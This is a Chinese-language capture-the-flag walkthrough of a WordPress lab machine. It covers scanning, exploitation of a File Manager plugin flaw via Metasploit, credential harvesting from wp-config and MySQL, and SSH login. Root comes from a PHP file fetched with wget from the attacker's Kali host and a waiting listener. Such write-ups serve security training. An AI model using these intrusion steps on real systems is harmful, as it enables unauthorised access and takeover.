靶机ip:192.168.181.145
kali ip: 192.168.181.129
首先进行ip扫描
打开网页进行查看
查看开启哪些端口
nmap -sC -sV 192.168.181.145 --min-rate=2000 -d
对目录进行扫描
打开/blog页面
发现notice无法进行跳转,修改/etc/hosts文件
然后在kali打开
用wpscan进行扫描
发现有File Manager的漏洞于是打开msfcondole
使用第二个,并进行相应的配置
运行,可以获得shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
可以获得shell
d98发现了一个bese64的编码的一段文字
这是翻译后的结果:1: RidDlE's DiAry dEstroYed By haRry in chaMbEr of SeCrets,翻译为 1:里德尔的日记在《密室》中被哈利毁掉
于是我们查找所有带有wordpress的目录名
find / -type d -name "wordpress" 2>/dev/null
我们查看到了所有数据库用户名和密码
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'mySecr3tPass');
define('DB_HOST', 'localhost');
define('DB_COLLATE', 'utf8_general_ci');
define('WP_CONTENT_DIR', '/usr/share/wordpress/wp-content');
于是进行爆破
爆破失败
我们进入到mysql,上面给了我们用户名和密码
在wordpress找到了密码$P$BYdTic1NGSb8hJbpVEMiJaAiNJDHtc.
select * from wp_users
对其进行MD5解码
password123
于是进行ssh登录
登录成功
进行提权
看看能否使用sudo提权
find / -perm -u=s -type f 2>/dev/null
没有可以利用的
于是查看是否有脚本
find / -name "*back*"
发现一个备份文件,于是进行查看
他告诉我们要在tmp下创建一个upload,获取权限
在kali端开启web服务
wget http://192.168.181.129:8888/11.php
将php文件下载到/tmp下
在kali端进行监听
稍等片刻后可以获得root权限
于是获得最终的flag